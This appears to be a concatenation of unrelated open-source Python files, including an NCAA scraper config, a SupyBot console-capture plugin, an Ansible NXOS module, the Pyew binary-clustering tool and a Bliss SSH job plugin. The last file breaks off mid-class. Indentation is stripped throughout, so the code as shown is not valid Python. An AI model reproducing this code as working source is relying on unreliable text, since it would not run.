# If the product of these four fractions is given in its lowest common terms, find the value of the denominator.
ans = 1
for i in range(10,100):
if i%10 == 0:continue
if i%11 == 0:continue
for j in range(10,100):
if j%10 == 0:continue
if j%11 == 0:continue
if j>=i:continue
si = str(i)
sj = str(j)
for a in sj:
if si.count(a) == 1:
ni = int(si.replace(a,''))
nj = int(sj.replace(a,''))
if float(j/i) == float(nj/ni):
# print(j,i,nj,ni,j/i)
ans *= ni/nj
print(ans)
|
sankroh/satchmo | refs/heads/master | satchmo/shipping/modules/ups/__init__.py | 2 | import shipper
from satchmo.configuration import config_choice_values
def get_methods():
return [shipper.Shipper(service_type=value) for value in config_choice_values('satchmo.shipping.modules.ups', 'UPS_SHIPPING_CHOICES')]
|
Aintno63/NCAA-playoff | refs/heads/master | scraper_Ncaa_settings.py | 1 | #!/usr/bin/python
##############################################################
# Program name: NCAA FOOTBALL Stats Scraper (Settings file)
# Version: 1.0
# By: Sean Middleton
# License: MPL 2.0 (see LICENSE file in root folder)
# Additional thanks:
# Refer to http://stats.ncaa.org/team/inst_team_list?sport_code=MBB&division=1 in setting these variables
##############################################################
# Select year for parsing
academic_year = "2014" # Set the academic year (2012 refers to 2011-2012 season). As of writing, this can range from 2010 to 2013.
year_index = "11540" # Set the index that maps to the academic year. This may be obtained from looking at the team URLs on the list of available teams, for the given academic year. As of writing, the [academic_year, year_index] mappings are: [2013, 11220], [2012, 10740], [2011, 10440], and [2010, 10260]
# What do you want to do? (Note: Lower tiers need higher tiers, i.e., ind_game_stats requires map_players (Tier 2), which requires map_teams (Tier 1).)
map_teams = 1 # Create a team mapping (0 = no, 1 = yes) -- TIER 1
map_schedule = 1 # Create schedule mapping (0 = no, 1 = yes)
map_players = 1 # Create a player mapping (0 = no, 1 = yes)
summary_teams = 1 # Get summary statistics for each team (0 = no, 1 = yes)
summary_players = 1 # Get summary statistics for each player (0 = no, 1 = yes)
ind_game_stats = 1 # Get individual game statistics (0 = no, 1 = yes)
ind_player_stats = 1 # Get individual player statistics (0 = no, 1 = yes)
ind_team_stats = 1 # Get individual team statistics (a line per team, such that each game will have two lines (one for away team, one for home team)) (0 = no, 1 = yes)
# Where do you want to save the data?
team_mappingfile = "mappings/team_mappings.tsv" # Data file for team mappings
player_mappingfile = "mappings/player_mappings.tsv" # Data file for player mappings
schedule_mappingfile = "mappings/schedule_mappings.tsv" # Data file for schedule mappings
summary_player_data = "data/summary_player_data.tsv" # Data file for individual player summary statistics
summary_team_data = "data/summary_team_data.tsv" # Data file for team summary statistics
game_data = "data/game_data.tsv" # Data file for each game
player_data = "data/player_data.tsv" # Data file for each player
team_data = "data/team_data.tsv" # Data file for each team
#### The variables below could be set, but probably don't need any modification #####
debugmode = 1 # Output program steps (0 = off, 1 = on)
params = { } # Any POST parameters that need to be sent (default)
http_header = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0",
"Accept": "text/plain, */*; q=0.01",
"Accept-Language": "en-US,en;q=0.5",
"DNT": "1",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Referer": "http://stats.ncaa.org/team/inst_team_list?sport_code=MBB&division=1",
"Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
} # Variables from the HTTP header (default)
start_url = 'http://stats.ncaa.org/team/inst_team_list?sport_code=MBB&academic_year=' + str(academic_year) + "&division=1" # URL to start from (Change this for different years). You can get this URL from http://stats.ncaa.org/team/inst_team_list?sport_code=MBB&division=1. This URL is for the 2011-2012 season.
domain_base = 'http://stats.ncaa.org' # Base domain
|
kg-bot/SupyBot | refs/heads/master | plugins/StdoutCapture/plugin.py | 1 | ###
# Copyright (c) 2013, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import sys
import json
import logging
import weakref
import supybot.utils as utils
from supybot.commands import *
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
try:
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization('StdoutCapture')
except:
# Placeholder that allows to run the plugin on a bot
# without the i18n module
_ = lambda x:x
class StdoutBuffer:
_buffer = utils.structures.RingBuffer(100)
def __init__(self, stdout):
self._real = stdout
def write(self, data):
self._real.write(data)
if data == '\n':
self._buffer[-1] += '\n'
else:
self._buffer.append(data)
def flush(self):
pass
class StdoutCapture(callbacks.Plugin):
"""Add the help for "@plugin help StdoutCapture" here
This should describe *how* to use this plugin."""
def __init__(self, irc):
super(StdoutCapture, self).__init__(irc)
self.StdoutBuffer = StdoutBuffer
sys.stdout = self.StdoutBuffer(sys.stdout)
sys.stderr = self.StdoutBuffer(sys.stderr)
# I'm being a bit evil here.
for logger in logging._handlerList:
if isinstance(logger, weakref.ref):
logger = logger()
if not hasattr(logger, 'stream'):
continue
if logger.stream is sys.stdout._real:
logger.stream = sys.stderr
elif logger.stream is sys.stderr._real:
logger.stream = sys.stderr
def die(self):
super(self.__class__, self).die()
assert isinstance(sys.stdout, self.StdoutBuffer)
assert isinstance(sys.stdout, self.StdoutBuffer)
for logger in logging._handlerList:
logger = logger()
if not hasattr(logger, 'stream'):
continue
if logger.stream in (sys.stdout, sys.stderr):
logger.stream = logger.stream._real
sys.stdout = sys.stdout._real
sys.stderr = sys.stderr._real
def history(self, irc, msg, args, number):
"""<number>
Return the last lines displayed in the console."""
irc.replies(StdoutBuffer._buffer[-number:])
history = wrap(history, ['positiveInt', 'owner'])
def pastebin(self, irc, msg, args, number, url=None):
"""<number> [<pastebin url>]
Paste the last lines displayed in the console on a pastebin and
returns the URL.
The pastebin has to support the LodgeIt API."""
base = url or self.registryValue('pastebin', msg.args[0])
if base.endswith('/'):
base = base[0:-1]
fd = utils.web.getUrlFd(base+'/json/?method=pastes.newPaste',
data=json.dumps({
'language': 'text',
'code': ''.join(StdoutBuffer._buffer[-number:]),
}),
headers={'Content-Type': 'application/json'})
irc.reply('%s/show/%s' % (base, json.load(fd)['data']))
pastebin = wrap(pastebin, ['owner', 'positiveInt', optional('text')])
Class = StdoutCapture
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: |
partofthething/home-assistant | refs/heads/dev | homeassistant/components/flunearyou/const.py | 9 | """Define flunearyou constants."""
import logging
DOMAIN = "flunearyou"
LOGGER = logging.getLogger(__package__)
DATA_COORDINATOR = "coordinator"
CATEGORY_CDC_REPORT = "cdc_report"
CATEGORY_USER_REPORT = "user_report"
|
shawnsi/ansible-modules-core | refs/heads/devel | network/nxos/nxos_template.py | 26 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = """
---
module: nxos_template
version_added: "2.1"
author: "Peter Sprygada (@privateip)"
short_description: Manage Cisco NXOS device configurations
description:
- Manages network device configurations over SSH or NXAPI. This module
allows implementors to work with the device running-config. It
provides a way to push a set of commands onto a network device
by evaluting the current running-config and only pushing configuration
commands that are not already configured. The config source can
be a set of commands or a template.
extends_documentation_fragment: nxos
options:
src:
description:
- The path to the config source. The source can be either a
file with config or a template that will be merged during
runtime. By default the task will search for the source
file in role or playbook root folder in templates directory.
required: false
default: null
force:
description:
- The force argument instructs the module to not consider the
current devices running-config. When set to true, this will
cause the module to push the contents of I(src) into the device
without first checking if already configured.
required: false
default: false
choices: [ "true", "false" ]
include_defaults:
description:
- The module, by default, will collect the current device
running-config to use as a base for comparision to the commands
in I(src). Setting this value to true will cause the module
to issue the command `show running-config all` to include all
device settings.
required: false
default: false
choices: [ "true", "false" ]
backup:
description:
- When this argument is configured true, the module will backup
the running-config from the node prior to making any changes.
The backup file will be written to backup_{{ hostname }} in
the root of the playbook directory.
required: false
default: false
choices: [ "true", "false" ]
config:
description:
- The module, by default, will connect to the remote device and
retrieve the current running-config to use as a base for comparing
against the contents of source. There are times when it is not
desirable to have the task get the current running-config for
every task in a playbook. The I(config) argument allows the
implementer to pass in the configuruation to use as the base
config for comparision.
required: false
default: null
"""
EXAMPLES = """
- name: push a configuration onto the device
nxos_template:
src: config.j2
- name: forceable push a configuration onto the device
nxos_template:
src: config.j2
force: yes
- name: provide the base configuration for comparision
nxos_template:
src: candidate_config.txt
config: current_config.txt
"""
RETURN = """
updates:
description: The set of commands that will be pushed to the remote device
returned: always
type: list
sample: ['...', '...']
responses:
description: The set of responses from issuing the commands on the device
retured: when not check_mode
type: list
sample: ['...', '...']
"""
def get_config(module):
config = module.params['config'] or dict()
if not config and not module.params['force']:
config = module.config
return config
def main():
argument_spec = dict(
src=dict(),
force=dict(default=False, type='bool'),
include_defaults=dict(default=False, type='bool'),
backup=dict(default=False, type='bool'),
config=dict()
)
mutually_exclusive = [('config', 'backup'), ('config', 'force')]
module = get_module(argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True)
result = dict(changed=False)
candidate = NetworkConfig(contents=module.params['src'], indent=2)
contents = get_config(module)
if contents:
config = NetworkConfig(contents=contents, indent=2)
result['_backup'] = contents
if not module.params['force']:
commands = candidate.difference(config)
else:
commands = str(candidate).split('\n')
if commands:
if not module.check_mode:
commands = [str(c).strip() for c in commands]
response = module.configure(commands)
result['responses'] = response
result['changed'] = True
result['updates'] = commands
module.exit_json(**result)
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
from ansible.module_utils.shell import *
from ansible.module_utils.netcfg import *
from ansible.module_utils.nxos import *
if __name__ == '__main__':
main()
|
be-cloud-be/horizon-addons | refs/heads/9.0 | partner-contact/partner_contact_nutrition_exclusion/models/res_partner.py | 1 | # -*- coding: utf-8 -*-
# Copyright 2016 Ursa Information Systems <http://ursainfosystems.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from openerp import fields, models
class ResPartner(models.Model):
_inherit = 'res.partner'
nutrition_exclusion_ids = fields.Many2many(comodel_name='product.product',
string='Exclusions',
domain="[('type', '=',"
" 'stockable')]")
|
mensler/ansible | refs/heads/devel | test/integration/targets/module_utils/module_utils/spam4/__init__.py | 12133432 | |
ManiacalLabs/BiblioPixel | refs/heads/master | test/bibliopixel/util/image/__init__.py | 12133432 | |
meletakis/collato | refs/heads/master | lib/python2.7/site-packages/django/conf/locale/en_GB/__init__.py | 12133432 | |
jit/pyew | refs/heads/master | gcluster.py | 14 | #!/usr/bin/env python
"""
A program's clusterization tool based on Pyew
Copyright (C) 2010, Joxean Koret
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os, sys
from hashlib import sha256
from pyew_core import CPyew
def primes(n):
if n==2: return [2]
elif n<2: return []
s=range(3,n+1,2)
mroot = n ** 0.5
half=(n+1)/2-1
i=0
m=3
while m <= mroot:
if s[i]:
j=(m*m-3)/2
s[j]=0
while j<half:
s[j]=0
j+=m
i=i+1
m=2*i+3
return [2]+[x for x in s if x]
class CAdjacencyList(object):
def __init__(self, data):
self.data = data
self.adjacency_lists = {}
def createAdjacencyList(self, pyew):
return pyew.function_stats.values()
def getSimilarity(self, s1, s2):
m = max(len(s1), len(s2))
diff1 = len(s1.difference(s2))
diff2 = len(s2.difference(s1))
diff = (diff1 + diff2)*100./m
simil1 = len(s1.intersection(s2))
simil = simil1*100. / m
metric = simil + diff
diff = diff * 100. / metric
return diff
def compareTwoSets(self, set1, set2):
pyew1 = set1.values()[0]
pyew2 = set2.values()[0]
al1 = self.createAdjacencyList(pyew1)
al2 = self.createAdjacencyList(pyew2)
if al1 == al2:
return 0
else:
s1 = set(al1)
s2 = set(al2)
print s1, s2
diff = len(s1.difference(s2)) + len(s2.difference(s1))
print diff
total = max(len(s1), len(s2))
print total, len(s1), len(s2)
simil = diff * 100. / total
return simil
def cluster(self):
if len(self.data) == 2:
set1 = self.data[0]
set2 = self.data[1]
return self.compareTwoSets(set1, set2)
class CPrimesCluster(object):
def __init__(self, data):
self.primes = primes(1024*1024)
self.data = data
def generateHash(self, pyew):
val = 1.
dones = []
primes_done = []
for f in pyew.functions:
nodes, edges, cc = pyew.function_stats[f]
if cc > 1 and (nodes, edges, cc) not in dones:
p = self.primes[cc]
if p not in primes_done:
val *= p
primes_done.append(p)
dones.append((nodes, edges, cc))
return val, dones
def compareManySets(self, sets):
files = {}
primes = {}
values = {}
print "File1;File2;Difference"
for s in sets:
pyew = s.values()[0]
val, prime = self.generateHash(pyew)
hash = sha256(pyew.getBuffer()).hexdigest()
primes[hash] = prime
values[hash] = val
files[hash] = pyew.filename
del pyew
dones = []
for h1 in values:
for h2 in values:
if h1 == h2 or (h1, h2) in dones or (h2, h1) in dones:
continue
if values[h1] == values[h2]:
print "%s;%s;0" % (files[h1], files[h2])
dones.append((h1, h2))
dones.append((h2, h1))
else:
dones.append((h1, h2))
dones.append((h2, h1))
s1 = set(primes[h1])
s2 = set(primes[h2])
diff = self.getSimilarity(s1, s2)
print "%s;%s;%f" % (files[h1], files[h2], diff)
def getSimilarity(self, s1, s2):
m = max(len(s1), len(s2))
diff1 = len(s1.difference(s2))
diff2 = len(s2.difference(s1))
diff = (diff1 + diff2)*100./m
simil1 = len(s1.intersection(s2))
simil = simil1*100. / m
metric = simil + diff
diff = diff * 100. / metric
return diff
def compareTwoSets(self, set1, set2):
pyew1 = set1.values()[0]
val1, primes1 = self.generateHash(pyew1)
pyew2 = set2.values()[0]
val2, primes2 = self.generateHash(pyew2)
s1 = set(primes1)
s2 = set(primes2)
if val1 == val2:
return 0
else:
diff = self.getSimilarity(s1, s2)
return diff
def cluster(self):
if len(self.data) == 2:
set1 = self.data[0]
set2 = self.data[1]
return self.compareTwoSets(set1, set2)
else:
return self.compareManySets(self.data)
class CExpertCluster(object):
def __init__(self, data):
self.data = data
def compareTwoSets(self, set1, set2):
# Get the ciclomatic complexity statistical data of the 2 samples
ccs1 = set1.values()[0].program_stats["ccs"]
ccs2 = set2.values()[0].program_stats["ccs"]
avg_cc_distance = abs(ccs1["avg"] - ccs2["avg"])
max_cc_distance = abs(ccs1["max"] - ccs2["max"])
min_cc_distance = abs(ccs1["min"] - ccs2["min"])
total_functions = abs(len(set1.values()[0].functions) - len(set2.values()[0].functions))
difference = avg_cc_distance*0.5 + \
max_cc_distance*0.3 + \
min_cc_distance*0.1 + \
total_functions*0.1
return difference
def cluster(self):
set1 = self.data[0]
set2 = self.data[1]
return self.compareTwoSets(set1, set2)
class CGraphCluster(object):
def __init__(self):
self.clear()
self.deep = False
self.timeout = 0
def addFile(self, filename):
self.files.append(filename)
def clear(self):
self.files = []
self.results = []
self.data = []
def processFile(self, filename):
sys.stderr.write("[+] Analyzing file %s\n" % filename)
sys.stderr.flush()
pyew = CPyew(batch=True)
pyew.deepcodeanalysis = self.deep
pyew.analysis_timeout = 0
pyew.loadFile(filename)
if pyew.format in ["PE", "ELF"]:
hash = sha256(pyew.getBuffer()).hexdigest()
self.data.append({hash:pyew})
else:
sys.stderr.writelines("Not a PE/ELF file")
sys.stderr.flush()
def comparePrimes(self):
cluster = CPrimesCluster(self.data)
val = cluster.cluster()
if val == 0:
print "Primes system: Programs are 100% equals"
else:
print "Primes system: Programs differs in", val, "% percent"
def compareAdjacencyLists(self):
cluster = CAdjacencyList(self.data)
val = cluster.cluster()
if val == 0:
print "ALists system: Programs are 100% equals"
else:
print "ALists System: Programs differs in %f%%" % val
def compareExpert(self):
cluster = CExpertCluster(self.data)
val = cluster.cluster()
if val == 0:
print "Expert system: Programs are 100% equals"
else:
print "Expert system: Programs differs in %f%s" % (round(val, 1), "%")
return val
def processFiles(self):
for f in self.files:
try:
self.processFile(f)
except:
sys.stderr.write("Error: %s\n" % str(sys.exc_info()[1]))
sys.stderr.flush()
def main(prog1, prog2):
cluster = CGraphCluster()
cluster.addFile(prog1)
cluster.addFile(prog2)
cluster.processFiles()
cluster.compareExpert()
cluster.comparePrimes()
cluster.compareAdjacencyLists()
def compareDirectory(path):
cluster = CGraphCluster()
cprimes = CPrimesCluster([])
alist = CAdjacencyList([])
if os.path.isdir(path):
for root, dirs, files in os.walk(path, topdown=False):
for name in files:
fname = os.path.join(root, name)
cluster.addFile(fname)
else:
cluster.addFile(path)
cluster.processFiles()
print "hash:filename:primes_hash:nodes_total:nodes_max:nodes_avg:nodes_min:edges_total:edges_max:edges_avg:edges_min:ccs_total:ccs_max:ccs_avg:ccs_min:functions:adjacency_list"
for x in cluster.data:
hash = x.keys()[0]
pyew = x.values()[0]
data = ""
for stat in pyew.program_stats:
data = data + ":".join(map(str, pyew.program_stats[stat].values())).replace(".", ",") + ":"
phash, dones = cprimes.generateHash(pyew)
print "%s:%s:%s:%s%d:%s" % (hash, pyew.f.name, str(phash.as_integer_ratio()[0]), data, len(pyew.functions), str(alist.createAdjacencyList(pyew)))
def usage():
print "Usage:", sys.argv[0], "<prog 1> <prog 2> | <directory>"
print
print "When comparing 2 binaries the difference between them is printed out."
print "When comparing a directory, a csv file with all the relevant data is printed out."
print
print "Examples:"
print "%s /bin/ls /bin/cp" % sys.argv[0]
print "%s /bin" % sys.argv[0]
print
if __name__ == "__main__":
if len(sys.argv) == 1:
usage()
elif len(sys.argv) == 3:
main(sys.argv[1], sys.argv[2])
else:
compareDirectory(sys.argv[1])
|
hoosteeno/kuma | refs/heads/master | kuma/core/tests/test_pagination.py | 26 | from django.test import RequestFactory
from nose.tools import eq_
import pyquery
from ..urlresolvers import reverse
from ..utils import paginate
from ..helpers import paginator
def test_paginated_url():
"""Avoid duplicating page param in pagination."""
url = '%s?%s' % (reverse('search'), 'q=bookmarks&page=2')
request = RequestFactory().get(url)
queryset = [{}, {}]
paginated = paginate(request, queryset)
eq_(paginated.url,
request.build_absolute_uri(request.path) + '?q=bookmarks')
def test_invalid_page_param():
url = '%s?%s' % (reverse('search'), 'page=a')
request = RequestFactory().get(url)
queryset = range(100)
paginated = paginate(request, queryset)
eq_(paginated.url,
request.build_absolute_uri(request.path) + '?')
def test_paginator_filter():
# Correct number of <li>s on page 1.
url = reverse('search')
request = RequestFactory().get(url)
pager = paginate(request, range(100), per_page=9)
html = paginator(pager)
doc = pyquery.PyQuery(html)
eq_(11, len(doc('li')))
# Correct number of <li>s in the middle.
url = '%s?%s' % (reverse('search'), 'page=10')
request = RequestFactory().get(url)
pager = paginate(request, range(200), per_page=10)
html = paginator(pager)
doc = pyquery.PyQuery(html)
eq_(13, len(doc('li')))
|
mmnelemane/neutron | refs/heads/master | neutron/plugins/cisco/service_plugins/cisco_router_plugin.py | 30 | # Copyright 2015 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from networking_cisco.plugins.cisco.service_plugins import cisco_router_plugin
class CiscoRouterPluginRpcCallbacks(
cisco_router_plugin.CiscoRouterPluginRpcCallbacks):
pass
class CiscoRouterPlugin(cisco_router_plugin.CiscoRouterPlugin):
pass
|
maas/maas | refs/heads/master | src/maasserver/djangosettings/snap.py | 1 | # Copyright 2017 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Django snap settings for maas project."""
import os
from maasserver.djangosettings import import_settings, settings
# Extend base and development settings.
import_settings(settings)
# Override the location of JS libraries.
JQUERY_LOCATION = os.path.join(
os.environ["SNAP"], "usr", "share", "javascript", "jquery"
)
ANGULARJS_LOCATION = os.path.join(
os.environ["SNAP"], "usr", "share", "javascript", "angular.js"
)
# Override path to static root.
STATIC_ROOT = os.path.join(
os.environ["SNAP"], "usr", "share", "maas", "web", "static"
)
# Override the preseed locations.
PRESEED_TEMPLATE_LOCATIONS = (
os.path.join(os.environ["SNAP_DATA"], "preseeds"),
os.path.join(os.environ["SNAP"], "etc", "maas", "preseeds"),
)
|
saga-project/bliss | refs/heads/master | bliss/plugins/ssh/job.py | 1 | # -*- coding: utf-8 -*-
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
__author__ = "Ashley Zebrowski"
__copyright__ = "Copyright 2012, Ashley Zebrowski"
__license__ = "MIT"
import bliss.saga
from bliss.interface import JobPluginInterface
from bliss.plugins.ssh.process import SSHJobProcess
class SSHJobPlugin(JobPluginInterface):
'''Implements an SSH plugin which makes use of Paramiko'''
########################################
##
class BookKeeper:
'''Keeps track of job and service objects'''
def __init__(self, parent):
self.objects = {}
self.processes = {}
self.parent = parent
def add_service_object(self, service_obj):
self.objects[hex(id(service_obj))] = {'instance' : service_obj, 'jobs' : []}
def del_service_obj(self, service_obj):
try:
self.objects.remove((hex(id(service_obj))))
except Exception:
pass
def add_job_object(self, job_obj, service_obj):
service_id = hex(id(service_obj))
job_id = hex(id(job_obj))
try:
self.objects[service_id]['jobs'].append(job_obj)
self.processes[job_id] = SSHJobProcess(jobdescription=job_obj.get_description(), plugin=self.parent, service_object=service_obj)
except Exception, ex:
self.parent.log_error_and_raise(bliss.saga.Error.NoSuccess,
"Can't register job: %s" % (ex))
def del_job_object(self, job_obj):
pass
def get_service_for_job(self, job_obj):
'''Return the service object the job is registered with'''
for key in self.objects.keys():
if job_obj in self.objects[key]['jobs']:
return self.objects[key]['instance']
self.parent.log_error_and_raise(bliss.saga.Error.NoSuccess,
"INTERNAL ERROR: Job object %s is not known by this plugin" % (job))
def get_job_for_jobid(self, service_obj, job_id):
'''Return the job object associated with the given job id'''
for job in self.list_jobs_for_service(service_obj):
proc = self.get_process_for_job(job)
if proc.getpid(str(service_obj._url)) == job_id:
return job
self.parent.log_error_and_raise(bliss.saga.Error.NoSuccess, "Job ID not known by this plugin.")
def list_jobs_for_service(self, service_obj):
'''List all jobs that are registered with the given service'''
service_id = hex(id(service_obj))
return self.objects[service_id]['jobs']
def get_process_for_job(self, job_obj):
'''Return the local process object for a given job'''
try:
return self.processes[hex(id(job_obj))]
except Exception, ex:
self.parent.log_error_and_raise(bliss.saga.Error.NoSuccess,
"INTERNAL ERROR: Job object %s is not associated with a process" % (job_obj))
##
########################################
_name = 'saga.plugin.job.ssh'
_schemas = ['ssh']
_apis = ['saga.job']
def __init__(self, url):
'''Class constructor'''
JobPluginInterface.__init__(self, name=self._name, schemas=self._schemas)
self.bookkeeper = self.BookKeeper(self)
def __del__ (self):
self.log_debug("In the deconstructor for the SSH job adaptor")
@classmethod
def sanity_check(self):
'''Implements interface from _PluginBase'''
try:
import subprocess
except Exception, ex:
print "module missing -- plugin disabled. (NEEDS LOGGING SUPPORT)"
return False
try:
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
import paramiko
except Exception, ex:
self.log_warning("paramiko module missing -- plugin disabled.")
return False
return True
def get_runtime_info(self):
'''Implements interface from _PluginBase'''
## Optional: Can be used for plug-in introspection during runtime.
text = "SSH Plugin standing by"
return text
def register_service_object(self, service_obj):
'''Implements interface from _JobPluginBase'''
self.bookkeeper.add_service_object(service_obj)
self.log_info("Registered new service object %s" % (repr(service_obj)))
def unregister_service_object(self, service_obj):
'''Implements interface from _JobPluginBase'''
self.bookkeeper.del_service_object(service_obj)
self.log_info("Unregistered service object %s" % (repr(service_obj)))
def unregister_job_object(self, job_obj):
'''Implements interface from _JobPluginBase'''
self.bookkeeper.del_job_object(job_obj)
self.log_info("Unregistered job object %s" % (repr(job_obj)))
def service_create_job(self, service_obj, job_description):
'''Implements interface from _JobPluginBase.
This method is called for saga.Service.create_job().
'''
if job_description.executable is None:
self.log_error_and_raise(bliss.saga.Error.BadParameter,
"No executable defined in job description")
try:
## Create a new job object
job = bliss.saga.job.Job()
job._Job__init_from_service(service_obj=service_obj,
job_desc=job_description)
self.bookkeeper.add_job_object(job, service_obj)
self.log_info("service.create_job() called")
return job
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess,
"Couldn't create a new job because: %s " % (str(ex)))
def service_list(self, service_obj):
'''Implements interface from _JobPluginBase'''
self.log_info("service.list() calle")
try:
return self.bookkeeper.list_jobs_for_service(service_obj)
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't retreive job list because: %s " % (str(ex)))
return list()
def service_get_job(self, service_obj, job_id):
'''Implements interface from _JobPluginBase'''
self.log_info("service.get_job() called")
try:
return self.bookkeeper.get_job_for_jobid(service_obj, job_id)
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't get job list because: %s " % (str(ex)))
return None
def job_get_state(self, job):
'''Implements interface from _JobPluginBase'''
self.log_info("job.get_state() called")
try:
service = self.bookkeeper.get_service_for_job(job)
return self.bookkeeper.get_process_for_job(job).getstate()
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't get job state because: %s " % (str(ex)))
return bliss.saga.job.Job.Unknown
def job_get_job_id(self, job):
'''Implements interface from _JobPluginBase'''
self.log_info("job.get_job_id() called")
try:
service = self.bookkeeper.get_service_for_job(job)
return self.bookkeeper.get_process_for_job(job).getpid(str(service._url))
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't get job id because: %s " % (str(ex)))
return "ERROR"
def job_run(self, job):
'''Implements interface from _JobPluginBase'''
if job.get_description().executable is None:
self.log_error_and_raise(bliss.saga.Error.BadParameter, "No executable defined in job description")
try:
service = self.bookkeeper.get_service_for_job(job)
self.log_info("job.run() called with %s" % service._url)
self.bookkeeper.get_process_for_job(job).run(job.get_description(), service._url)
self.log_info("Started process: %s %s" % (job.get_description().executable, job.get_description().arguments))
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't run job because: %s " % (str(ex)))
def job_cancel(self, job, timeout):
'''Implements interface from _JobPluginBase'''
self.log_info("job.cancel() called")
try:
service = self.bookkeeper.get_service_for_job(job)
self.bookkeeper.get_process_for_job(job).terminate()
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't terminate job because: %s " % (str(ex)))
def job_wait(self, job, timeout):
'''Implements interface from _JobPluginBase'''
self.log_info("job.wait() called")
try:
service = self.bookkeeper.get_service_for_job(job)
self.bookkeeper.get_process_for_job(job).wait(timeout)
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't wait for the job because: %s " % (str(ex)))
def job_get_exitcode(self, job_obj):
'''Implements interface from _JobPluginBase'''
self.log_info("job.get_exitcode() called")
try:
#service = self.bookkeeper.get_service_for_job(job_obj)
#process = self.bookkeeper.get_process_for_job(job_obj)
#jobstate = process.getstate()
#if jobstate != bliss.saga.Job.Done or jobstate != bliss.saga.job.Failed:
# self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't get the job's exitcode. Job must be in 'Done' or 'Failed' state.")
#else:
return self.bookkeeper.get_process_for_job(job_obj).get_exitcode()
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't get exitcode for job because: %s " % (str(ex)))
|
antonve/s4-project-mooc | refs/heads/master | common/djangoapps/track/tests/__init__.py | 150 | """Helpers for tests related to emitting events to the tracking logs."""
from datetime import datetime
from django.test import TestCase
from django.test.utils import override_settings
from freezegun import freeze_time
from pytz import UTC
from eventtracking import tracker
from eventtracking.django import DjangoTracker
FROZEN_TIME = datetime(2013, 10, 3, 8, 24, 55, tzinfo=UTC)
IN_MEMORY_BACKEND_CONFIG = {
'mem': {
'ENGINE': 'track.tests.InMemoryBackend'
}
}
class InMemoryBackend(object):
"""A backend that simply stores all events in memory"""
def __init__(self):
